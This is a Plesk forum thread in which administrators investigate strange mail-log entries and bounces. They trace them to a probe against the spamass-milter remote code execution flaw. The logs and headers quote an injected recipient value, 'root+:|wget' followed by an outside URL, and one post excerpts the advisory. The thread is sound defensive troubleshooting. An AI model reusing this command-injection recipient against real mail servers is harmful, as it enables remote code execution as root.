• Introducing WebPros Cloud - a fully managed infrastructure platform purpose-built to simplify the deployment of WebPros products !  WebPros Cloud enables you to easily deliver WebPros solutions — without the complexity of managing the infrastructure.
    Join the pilot program today!
  • The Horde component is removed from Plesk Installer. We recommend switching to another webmail software supported in Plesk.
  • The BIND DNS server has already been deprecated and removed from Plesk for Windows.
    If a Plesk for Windows server is still using BIND, the upgrade to Plesk Obsidian 18.0.70 will be unavailable until the administrator switches the DNS server to Microsoft DNS. We strongly recommend transitioning to Microsoft DNS within the next 6 weeks, before the Plesk 18.0.70 release.

Is this a new hack?

R

Ritey

Guest
Hi,

My plesk has "reject" set to all mail domains. Yet today i received two bounces. So i looked at the mail log.
/usr/local/psa/log/maillog and found some strange enties.....

Apr 11 15:15:21 plesk /var/qmail/bin/relaylock[7933]: /var/qmail/bin/relaylock: mail from 85.92.138.149:49771 (hosted.by.pcextreme)
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: Handlers Filter before-queue for qmail started ...
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: from=blue@dick.com
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: to=root+:|wget http://xfortunes.in/x1x.php
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: hook_dir = '/usr/local/psa/handlers/before-queue'
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: call_handlers: call executable = '/usr/local/psa/handlers/info/05-grey-qMrEAh/executable'
Apr 11 15:15:21 plesk greylisting filter[7937]: Starting greylisting filter...
Apr 11 15:15:21 plesk greylisting filter[7937]: Unable get domain name by e-mail address root+:|wget http://xfortunes.in/x1x.php: Success
Apr 11 15:15:21 plesk greylisting filter[7937]: Unable to get GL trio status
Apr 11 15:15:21 plesk greylisting filter[7937]: Unable to check message
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: call_handlers: Error during call '/usr/local/psa/handlers/info/05-grey-qMrEAh/executable' handler
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: LOG Internal error in handler '05-grey-qMrEAh'. Skip handler.
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: call_handlers: call executable = '/usr/local/psa/handlers/info/10-spf-ixyyCD/executable'
Apr 11 15:15:21 plesk spf filter[7938]: Starting spf filter...
Apr 11 15:15:21 plesk spf filter[7938]: Error code: (2) Could not find a valid SPF record
Apr 11 15:15:21 plesk spf filter[7938]: Failed to query MAIL-FROM: No DNS data for 'dick.com'.
Apr 11 15:15:21 plesk spf filter[7938]: SPF result: none
Apr 11 15:15:21 plesk spf filter[7938]: SPF status: PASS
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: handlers_stderr: PASS
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: call_handlers: PASS during call '/usr/local/psa/handlers/info/10-spf-ixyyCD/executable' handler
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: recipient[3] = 'root+:|wget http://xfortunes.in/x1x.php'
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: handlers dir = '/usr/local/psa/handlers/before-queue/recipient/root+:|wget http://xfortunes.in/x1x.php'
Apr 11 15:15:21 plesk qmail-queue-handlers[7936]: starter: submitter[7939] exited normally
Apr 11 15:15:21 plesk qmail: 1270995321.460367 new msg 403377118
Apr 11 15:15:21 plesk qmail: 1270995321.460422 info msg 403377118: bytes 236 from <blue@dick.com> qp 7939 uid 2020
Apr 11 15:15:21 plesk qmail: 1270995321.467336 starting delivery 879: msg 403377118 to local root+:|wget_http://xfortunes.in/x1x.php@plesk.DOMAIN.net
Apr 11 15:15:21 plesk qmail: 1270995321.467372 status: local 1/10 remote 0/20
Click to expand...

I replaced my real domain with DOMAIN.
I also added and x to the beggining of the URLs as i dont want anyone to goto that site by mistake!

As you can see by the recipient it contains a wget... This to me is a little worrying!
And also why did qmail decide to send a bounce?
And why was my plesk domain name appended to the original recipient?

My plesk is on the latest 9.3 version.

Can anyone shed some light on this please?
 
It looks like that your server is compromised. Did you tried to check it with chkrootkit or rkhunter ?
 
Thanks for your reply.

I did try to emulate the issue (but obviously using a safe url that i can track). And found that the 'wget ...' in the recipient, is not actually executed. So that is one thing to be grateful for!

But it does seem to create a bounce though which is a little worrying.

I have checked the box and it seems fine.

So the issue for me really is, how can i prevent ALL bounce mails?
 
I got the same mail. On a test machine i downloaded the x1x.php using wget. What i get is a text string "xxx".

Notes:
1. three underscores in front of the "fortunes" domain
2. replaced the real Hostname (actualy it was my reverse dns) with MY-REVERSE-DNS
3. Seems i'm not compromised but i'm investigating.
4. I'm not using parallels. It's a debian box latest patches applied

From blue@dick.com Sat Apr 10 09:23:06 2010
Return-Path: <blue@dick.com>
X-Original-To: "root+:|wget http://___fortunes.in/x1x.php"
Delivered-To: "root+:|wget http://___fortunes.in/x1x.php"@MY-REVERSE-DNS
Received: from bluedick (unknown [208.88.6.50])
by MY-REVERSE-DNS (Postfix) with SMTP id 407DA54A0872
for <"root+:|wget http://___fortunes.in/x1x.php">; Sat, 10 Apr 2010 09:23:$
Message-Id: <20100410072306.407DA54A0872@MY-REVERSE-DNS>
Date: Sat, 10 Apr 2010 09:23:06 +0200 (CEST)
From: blue@dick.com
To: undisclosed-recipients:;
Status: RO
Content-Length: 0
Lines: 0
Click to expand...
 
It could well be that the sender expects the bounce message to be read by a certain mail client or webmail. In which case it may render the recipient name to be something clickable and once clicked, could then trigger some other nasty stuff. Such as vulnerabilities in mail/webmail clients.
 
Hi,
i found it. They try to exploit SpamAssassin's milter vulnerability.
Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).
Click to expand...
Spamassassin Milter Plugin Remote Root Attack
http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html

Phew :) good i fixed that already.
 
and the question is : does Plesk use this software embedded somewhere ??
 
Well found cepstrum.

How a plugin be to for it to make a such a possible. The author of it should.

But my original question is still as of yet unanswered. Is it possible to stop ALL.

This little script hacker didnt get what he wanted but he did manage to make a bounce where bounces shouldnt happen.

So it has exposed an issue in my thoughts, that needs fixing.
 
You must log in or register to reply here.

Similar threads

Mi-Z
Resolved Opening SSH Terminal in Plesk fails
Replies
10
Views
835
Mi-Z
Mi-Z
W
Issue Mail forwarded on the server in the target mailbox is delivered to the SPAM folder
Replies
0
Views
549
W4ru
W
I
Question mails that get lost
Replies
7
Views
5K
Inma
I
L
Issue 4.3.0 deferred (Command died with signal 15: "/usr/lib64/plesk-9.0/postfix-local")
Replies
2
Views
821
lucflash
L
ilogus
Resolved Incoming email DKIM issue
Replies
4
Views
682
ilogus
ilogus
Back
Top